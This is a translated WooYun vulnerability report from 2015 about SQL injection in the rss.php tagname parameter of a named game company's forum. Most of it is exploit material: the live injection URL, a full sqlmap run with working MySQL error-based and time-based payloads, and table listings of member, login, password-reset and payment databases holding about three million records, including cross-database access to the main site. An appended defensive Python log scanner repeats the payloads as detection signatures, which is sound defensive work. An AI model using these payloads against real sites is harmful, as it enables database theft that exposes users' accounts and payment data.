
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144784

Title: A 第一波游戏 site has SQL injection; 3 million records, and cross-database queries reach the main site (including the OA system)

Vendor: 第一波游戏

Author: 路人甲

Submitted: 2015-10-04 23:14

Fix deadline: 2015-11-18 23:16

Disclosed: 2015-11-18 23:16

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-04: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-11-18: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A 第一波游戏 site has SQL injection; 3 million records, and cross-database queries reach the main site (including the OA system)

Detailed description:

Injection point:
http://bbs.ebogame.com/rss.php?forumid=0&tagname=
sqlmap screenshot: [image 1.jpg, not reproduced here]


【Forum databases: 230k + 80k rows】
Database: 5ebo_ucenter
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| uc_members | 230374 |
| uc_memberfields | 142469 |
| uc_notelist | 1217 |
| uc_pm_members | 77 |
| uc_pm_indexes | 54 |
| uc_pm_lists | 40 |
| uc_settings | 26 |
| uc_newpm | 15 |
| uc_pm_messages_0 | 7 |
| uc_pm_messages_6 | 7 |
| uc_pm_messages_4 | 6 |
| uc_pm_messages_7 | 6 |
| uc_pm_messages_1 | 5 |
| uc_pm_messages_2 | 5 |
| uc_pm_messages_3 | 5 |
| uc_pm_messages_5 | 5 |
| uc_pm_messages_8 | 4 |
| uc_pm_messages_9 | 4 |
| uc_applications | 2 |
| uc_failedlogins | 1 |
| uc_protectedmembers | 1 |
+---------------------------------------+---------+
Database: 5ebo_bbs
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pre_ucenter_members | 87952 |
| ebogame_member_info | 87798 |
| ebogame_member_info_copy | 83881 |
| pre_common_district | 45051 |
| anhei_activate_num | 43500 |
| pre_forum_post | 27341 |
| anhei_member | 21395 |
| anhei_packs_num | 20000 |
| pre_forum_filter_post | 12427 |
| ebogame_phone_code | 9254 |
| pre_home_notification | 7898 |
| pre_forum_threadpartake | 7626 |
| pre_common_credit_rule_log | 7442 |
| pre_common_member | 7273 |
| pre_common_member_count | 7273 |
| pre_common_member_field_forum | 7273 |
| pre_common_member_field_home | 7273 |
| pre_common_member_profile | 7273 |
| pre_common_member_status | 7273 |
| pre_forum_thread | 5991 |
| ebogame_member_money | 5648 |
| pre_common_onlinetime | 4244 |
| pre_forum_statlog | 3520 |
| pre_forum_threadmod | 3396 |
| ebogame_charge | 2537 |
| pre_forum_sofa | 1490 |
| ebogame_orderhistory | 1400 |
| pre_common_member_newprompt | 1340 |
| pre_forum_attachment | 1296 |
| pre_forum_pollvoter | 1174 |
| pre_forum_threadlog | 1019 |
| pre_ucenter_memberfields | 888 |
| pre_common_member_archive | 706 |
| pre_ucenter_pm_members | 647 |
| ebogame_member_findpass | 588 |
| pre_common_stat | 484 |
| pre_common_setting | 444 |
| pre_forum_threadimage | 424 |
| pre_ucenter_pm_indexes | 420 |
| pre_common_tagitem | 346 |
| pre_ucenter_pm_lists | 329 |
| pre_forum_attachment_8 | 296 |
| pre_forum_postlog | 228 |
| pre_forum_attachment_unused | 221 |
| pre_forum_threadhot | 151 |
| pre_qqy_ltnclog | 143 |
| pre_forum_attachment_1 | 122 |
| pre_forum_attachment_7 | 122 |
| pre_common_member_crime | 121 |
| pre_common_syscache | 121 |
| pre_common_tag | 115 |
| pre_forum_rsscache | 110 |
| pre_common_block_style | 103 |
| pre_common_member_temp___ | 100 |
| pre_forum_attachment_4 | 95 |
| pre_common_stylevar | 90 |
| pre_forum_attachment_6 | 89 |
| pre_common_member_action_log | 88 |
| pre_forum_attachment_0 | 88 |
| ebogame_charge_total | 87 |
| anhei_day_received | 85 |
| pre_common_smiley | 85 |
| pre_security_evilpost | 75 |
| pre_forum_attachment_5 | 73 |
| pre_common_connect_guest | 69 |
| pre_common_admincp_perm | 68 |
| pre_forum_newthread | 68 |
| pre_ucenter_newpm | 65 |
| pre_forum_attachment_2 | 64 |
| pre_forum_attachment_3 | 63 |
| pre_forum_threadcalendar | 57 |
| pre_ucenter_pm_messages_2 | 55 |
| ebogame_charge_copy | 53 |
| pre_common_nav | 52 |
| pre_common_member_profile_setting | 51 |
| pre_forum_attachment_9 | 49 |
| pre_ucenter_pm_messages_3 | 47 |
| pre_connect_memberbindlog | 44 |
| pre_ucenter_pm_messages_7 | 44 |
| pre_forum_forumfield | 43 |
| pre_ucenter_pm_messages_4 | 43 |
| pre_forum_forum | 42 |
| pre_ucenter_pm_messages_9 | 41 |
| pre_ucenter_pm_messages_5 | 40 |
| pre_ucenter_pm_messages_6 | 39 |
| pre_ucenter_pm_messages_1 | 38 |
| pre_common_member_connect | 37 |
| pre_ucenter_pm_messages_0 | 37 |
| pre_home_friend_request | 36 |
| pre_ucenter_pm_messages_8 | 36 |
| pre_connect_postfeedlog | 35 |
| pre_common_optimizer | 34 |
| pre_common_credit_rule | 32 |
| pre_home_favorite | 32 |
| pre_forum_polloption | 31 |
| pre_ucenter_notelist | 31 |
| pre_forum_modwork | 29 |
| pre_ucenter_settings | 27 |
| pre_common_magic | 24 |
| ebogame_media_page_detail | 23 |
| anhei_activate_record | 21 |
| pre_forum_hotreply_member | 21 |
| pre_common_cron | 20 |
| pre_forum_hotreply_number | 19 |
| pre_forum_post_tableid | 18 |
| ebogame_media_page | 16 |
| pre_common_myapp | 16 |
| pre_common_usergroup | 16 |
| pre_common_usergroup_field | 16 |
| pre_home_click | 15 |
| pre_home_pokearchive | 15 |
| pre_common_plugin | 14 |
| pre_home_friend | 14 |
| pre_home_poke | 14 |
| pre_security_eviluser | 13 |
| pre_common_statuser | 11 |
| pre_forum_postcomment | 11 |
| pre_connect_feedlog | 10 |
| pre_forum_medal | 10 |
| pre_common_report | 8 |
| pre_home_friendlog | 8 |
| ebogame_media_partners | 7 |
| pre_common_admincp_cmenu | 7 |
| pre_common_pluginvar | 7 |
| pre_common_admincp_member | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_forum_poll | 5 |
| pre_forum_poststick | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_common_admingroup | 3 |
| pre_common_friendlink | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_forum_postcache | 3 |
| pre_forum_warning | 3 |
| pre_security_failedlog | 3 |
| pre_common_advertisement | 2 |
| pre_common_block | 2 |
| pre_common_cache | 2 |
| pre_common_patch | 2 |
| pre_common_style | 2 |
| pre_common_template | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_mobile_setting | 2 |
| anhei_day_received_limited | 1 |
| ebogame_media_anomalydata | 1 |
| ebogame_media_setting | 1 |
| pre_common_admincp_session | 1 |
| pre_common_banned | 1 |
| pre_common_diy_data | 1 |
| pre_common_failedip | 1 |
| pre_common_failedlogin | 1 |
| pre_common_invite | 1 |
| pre_common_regip | 1 |
| pre_forum_thread_moderate | 1 |
| pre_forum_threadprofile | 1 |
| pre_forum_threadprofile_group | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_failedlogins | 1 |
+---------------------------------------+---------+
Cross-database query:
【Main-site database, ebogame_member_info: 330k+ rows】
Database: ebogame_1
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ebogame_member_integral | 490201 |
| ebogame_member_login | 433668 |
| ebogame_activation | 400446 |
| ebogame_member_serv | 334756 |
| ebogame_member_info | 334038 |
| ebogame_member | 333889 |
| ebogame_advertising_click | 50020 |
| ebogame_charge | 39157 |
| ebogame_game_gift_code_17173 | 20000 |
| ebogame_member_char | 10680 |
| ebogame_game_code | 6210 |
| ebogame_game_gift_code | 5000 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 1793 |
| ebogame_news | 1588 |
| ebogame_extension_member | 1586 |
| ebogame_question_reply | 755 |
| ebogame_charge_heepay | 591 |
| ebogame_questions | 505 |
| ebogame_game_areas | 221 |
| ebogame_advertising | 73 |
| ebogame_category | 33 |
| ebogame_price | 33 |
| ebogame_extension_percent | 22 |
| ebogame_extension_settlemen | 21 |
| ebogame_games | 18 |
| ebogame_game_gift_info_17173 | 10 |
| ebogame_integral | 9 |
| ebogame_extension | 6 |
| ebogame_game_gift_info_ | 3 |
+---------------------------------------+---------+
【Another main-site database, ebogame_member: 2.33M+ rows】
Database: ebogame
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ebogame_member_login | 4024633 |
| ebogame_member | 2336075 |
| ebogame_activation | 826828 |
| ebogame_member_integral | 674280 |
| pre_ucenter_members | 387637 |
| bbs_userlist | 326338 |
| ebogame_member_info | 277802 |
| ebogame_member_serv | 277792 |
| ebogame_member_char | 238784 |
| ebogame_charge | 169756 |
| api_send_mail | 61235 |
| ebogame_advertising_click | 51794 |
| pre_common_district | 45051 |
| ebogame_charge_copy | 43282 |
| pre_forum_post | 27728 |
| ebogame_game_gift_code_17173 | 20000 |
| pre_home_notification | 14233 |
| pre_common_credit_rule_log | 13011 |
| pre_forum_thread | 12229 |
| pre_forum_threadpartake | 10744 |
| pre_forum_threadmod | 9011 |
| pre_common_member_count | 8179 |
| pre_common_member_field_forum | 8179 |
| pre_common_member_field_home | 8179 |
| pre_common_member_profile | 8179 |
| pre_common_member_status | 8179 |
| pre_common_member | 8171 |
| pre_common_onlinetime | 6443 |
| ebogame_game_code | 6210 |
| bbs_posts | 5153 |
| ebogame_game_gift_code | 5000 |
| pre_ucenter_memberfields | 4808 |
| pre_forum_statlog | 4266 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 2638 |
| ebogame_extension_member | 2555 |
| ebogame_news | 2288 |
| bbs_apclog | 2054 |
| ebogame_question_reply | 1668 |
| pre_forum_attachment | 1566 |
| pre_forum_pollvoter | 1455 |
| bbs_actlogs | 1449 |
| pre_common_member_crime | 1239 |
| pre_forum_modwork | 1003 |
| pre_common_stat | 892 |
| bbs_threads | 870 |
| ebogame_questions | 779 |
| pre_forum_thread_moderate | 653 |
| ebogame_charge_heepay | 591 |
| bbs_primsg | 517 |
| pre_common_member_action_log | 496 |
| pre_ucenter_pm_indexes | 419 |
| pre_forum_threadimage | 405 |
| pre_common_setting | 392 |
| ebogame_game_areas | 358 |
| pre_forum_polloption | 273 |
| pre_forum_threaddisablepos | 244 |
| pre_ucenter_pm_members | 244 |
| pre_forum_attachment_1 | 222 |
| pre_forum_attachment_3 | 212 |
| pre_forum_attachment_4 | 180 |
| pre_forum_post_tableid | 174 |
| pre_forum_attachment_9 | 168 |
| pre_forum_attachment_5 | 161 |
| sglj_extension | 154 |
| ebogame_advertising | 151 |
| pre_ucenter_pm_lists | 129 |
| pre_forum_attachment_7 | 124 |
| pre_common_tagitem | 118 |
| bbs_ugoptlist | 115 |
| pre_ucenter_pm_messages_0 | 114 |
| pre_forum_attachment_6 | 106 |
| pre_common_block_style | 103 |
| pre_forum_attachment_unused | 103 |
| pre_forum_attachment_0 | 102 |
| pre_forum_attachment_2 | 102 |
| pre_common_syscache | 95 |
| pre_ucenter_notelist | 90 |
| pre_common_smiley | 85 |
| pre_forum_attachment_8 | 85 |
| pre_forum_rsscache | 80 |
| pre_ucenter_pm_messages_3 | 70 |
| pre_common_admincp_perm | 67 |
| pre_common_member_profile_setting | 51 |
| pre_forum_poll | 49 |
| pre_ucenter_pm_messages_7 | 49 |
| pre_common_tag | 48 |
| pre_common_nav | 47 |
| pre_common_stylevar | 45 |
| pre_ucenter_newpm | 40 |
| pre_forum_forumfield | 38 |
| pre_forum_forum | 37 |
| pre_common_credit_log | 36 |
| pre_ucenter_pm_messages_5 | 35 |
| ebogame_category | 33 |
| ebogame_price | 33 |
| pre_home_friend | 32 |
| pre_common_credit_rule | 31 |
| pre_ucenter_failedlogins | 31 |
| pre_ucenter_pm_messages_2 | 31 |
| pre_home_friend_request | 30 |
| pre_ucenter_pm_messages_6 | 29 |
| pre_ucenter_settings | 26 |
| bbs_emoticons | 25 |
| ebogame_games | 25 |
| pre_ucenter_pm_messages_4 | 25 |
| bbs_search | 23 |
| pre_ucenter_pm_messages_8 | 23 |
| ebogame_extension_percent | 22 |
| pre_ucenter_pm_messages_9 | 22 |
| ebogame_extension_settlemen | 21 |
| pre_ucenter_pm_messages_1 | 21 |
| pre_common_cron | 18 |
| pre_common_failedlogin | 17 |
| pre_common_usergroup | 16 |
| pre_common_usergroup_field | 16 |
| pre_home_friendlog | 16 |
| bbs_forumdata | 15 |
| bbs_tags | 15 |
| pre_home_click | 15 |
| pre_common_report | 14 |
| pre_forum_threadclosed | 14 |
| bbs_contacts | 13 |
| pre_forum_replycredit | 13 |
| bbs_levels | 12 |
| pre_common_banned | 12 |
| pre_common_session | 12 |
| pre_forum_poststick | 11 |
| ebogame_game_gift_info_17173 | 10 |
| pre_forum_medal | 10 |
| ebogame_integral | 9 |
| pre_common_plugin | 9 |
| pre_home_favorite | 9 |
| bbs_usergroup | 8 |
| bbs_polls | 7 |
| pre_forum_warning | 7 |
| ebogame_extension | 6 |
| pre_common_pluginvar | 6 |
| pre_forum_moderator | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_common_admingroup | 4 |
| pre_common_advertisement | 4 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| ebogame_game_gift_info_ | 3 |
| pre_common_admincp_member | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_common_admincp_cmenu | 2 |
| pre_common_block | 2 |
| pre_common_credit_rule_log_field | 2 |
| pre_common_diy_data | 2 |
| pre_common_patch | 2 |
| pre_common_regip | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_home_poke | 2 |
| pre_home_pokearchive | 2 |
| pre_mobile_setting | 2 |
| bbs_favorites | 1 |
| bbs_lastest | 1 |
| pre_common_admincp_session | 1 |
| pre_common_cache | 1 |
| pre_common_statuser | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
【The OA and sub-site databases are reachable as well】
200k+ rows
【Total: roughly 3 million rows】

Proof of vulnerability:

【Full sqlmap run】

[17:28:38] [INFO] testing connection to the target URL
[17:28:38] [INFO] testing if the target URL is stable. This can take a couple of seconds
[17:28:39] [INFO] target URL is stable
[17:28:39] [INFO] testing if GET parameter 'forumid' is dynamic
[17:28:39] [INFO] confirming that GET parameter 'forumid' is dynamic
[17:28:39] [WARNING] GET parameter 'forumid' does not appear dynamic
[17:28:39] [WARNING] heuristic (basic) test shows that GET parameter 'forumid' might not be injectable
[17:28:39] [INFO] testing for SQL injection on GET parameter 'forumid'
[17:28:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:28:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:28:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:28:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:28:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:28:42] [INFO] testing 'MySQL inline queries'
[17:28:42] [INFO] testing 'PostgreSQL inline queries'
[17:28:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:28:42] [INFO] testing 'Oracle inline queries'
[17:28:42] [INFO] testing 'SQLite inline queries'
[17:28:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:28:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:28:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:28:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:28:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:28:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:28:44] [INFO] testing 'Oracle AND time-based blind'
[17:28:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:28:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:28:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[17:28:53] [WARNING] GET parameter 'forumid' is not injectable
[17:28:53] [INFO] testing if GET parameter 'tagname' is dynamic
[17:28:53] [INFO] confirming that GET parameter 'tagname' is dynamic
[17:28:53] [INFO] GET parameter 'tagname' is dynamic
[17:28:53] [INFO] heuristic (basic) test shows that GET parameter 'tagname' might be injectable (possible DBMS: 'MySQL')
[17:28:53] [INFO] heuristic (XSS) test shows that GET parameter 'tagname' might be vulnerable to XSS attacks
[17:28:53] [INFO] testing for SQL injection on GET parameter 'tagname'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[17:29:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:05] [WARNING] reflective value(s) found and filtering out
[17:29:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:29:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:29:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[17:29:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[17:29:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[17:29:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[17:29:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[17:29:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[17:29:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[17:29:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[17:29:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:29:11] [INFO] GET parameter 'tagname' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:29:11] [INFO] testing 'MySQL inline queries'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:29:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[17:29:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[17:29:14] [INFO] GET parameter 'tagname' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[17:29:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:29:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:29:15] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[17:29:58] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[17:29:58] [INFO] testing 'MySQL UNION query (43) - 22 to 40 columns'
[17:30:00] [INFO] testing 'MySQL UNION query (43) - 42 to 60 columns'
[17:30:01] [INFO] testing 'MySQL UNION query (43) - 62 to 80 columns'
[17:30:02] [INFO] testing 'MySQL UNION query (43) - 82 to 100 columns'
[17:30:04] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
GET parameter 'tagname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 440 HTTP(s) requests:
---
Parameter: tagname (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: forumid=0&tagname=' AND (SELECT 1938 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (CASE WHEN (1938=1938) THEN 1 ELSE 0 END)),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HpMu'='HpMu
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: forumid=0&tagname=' AND 3393=BENCHMARK(5000000,MD5(0x7a776b4d)) AND 'ttsm'='ttsm
---
[17:30:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
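Added example, not part of the original report: a small Python scanner that flags, in nginx access-log lines, requests whose query parameters carry the two signatures sqlmap confirmed above against rss.php?tagname= (the MySQL error-based FLOOR(RAND(0)*2) ... GROUP BY trick and the BENCHMARK time-based heavy query) plus UNION column probing, so a defender can find this kind of probing in historical logs. The log lines, IP addresses and timestamps are constructed, and the nginx default combined log format is assumed.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Signatures of the techniques sqlmap reported against rss.php?tagname= above:
# MySQL error-based (duplicate-key trick: FLOOR(RAND(0)*2) ... GROUP BY),
# time-based blind (BENCHMARK heavy query) and generic UNION column probing.
SIGNATURES = {
    "mysql-error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "mysql-time-based": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
    "union-probe": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
}

# Assumed nginx combined log format: ip - user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def scan_line(line):
    """Return a finding for one access-log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = set()
    # parse_qs URL-decodes each value once, which is how sqlmap sends payloads.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            for sig, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.add((name, sig))
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
            "status": int(m.group("status")), "hits": sorted(hits)}

def scan_log(lines):
    """Scan an iterable of log lines and return only the flagged ones, in order."""
    return [f for f in (scan_line(l) for l in lines) if f]

def nginx_line(ip, ts, tagname, status=200):
    """Build a constructed access-log line for GET /rss.php?forumid=0&tagname=..."""
    qs = "forumid=0&tagname=" + quote(tagname, safe="")
    return f'{ip} - - [{ts}] "GET /rss.php?{qs} HTTP/1.1" {status} 812 "-" "Mozilla/5.0"'

# Constructed sample log: one benign request, then the two payloads sqlmap reported.
ERROR_BASED = ("' AND (SELECT 1938 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (CASE WHEN "
               "(1938=1938) THEN 1 ELSE 0 END)),0x7178627a71,FLOOR(RAND(0)*2))x FROM "
               "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HpMu'='HpMu")
TIME_BASED = "' AND 3393=BENCHMARK(5000000,MD5(0x7a776b4d)) AND 'ttsm'='ttsm"
SAMPLE_LOG = [
    nginx_line("203.0.113.10", "04/Oct/2015:17:20:01 +0800", "news"),
    nginx_line("198.51.100.7", "04/Oct/2015:17:29:11 +0800", ERROR_BASED, status=500),
    nginx_line("198.51.100.7", "04/Oct/2015:17:29:14 +0800", TIME_BASED),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded parameter value rather than the raw request line is what keeps the signatures from being defeated by sqlmap's URL encoding; a WAF or log pipeline that inspects only the raw line would miss `FLOOR%28RAND%280%29%2A2%29`.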


Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused the report

Vulnerability Rank: 15 (WooYun rating)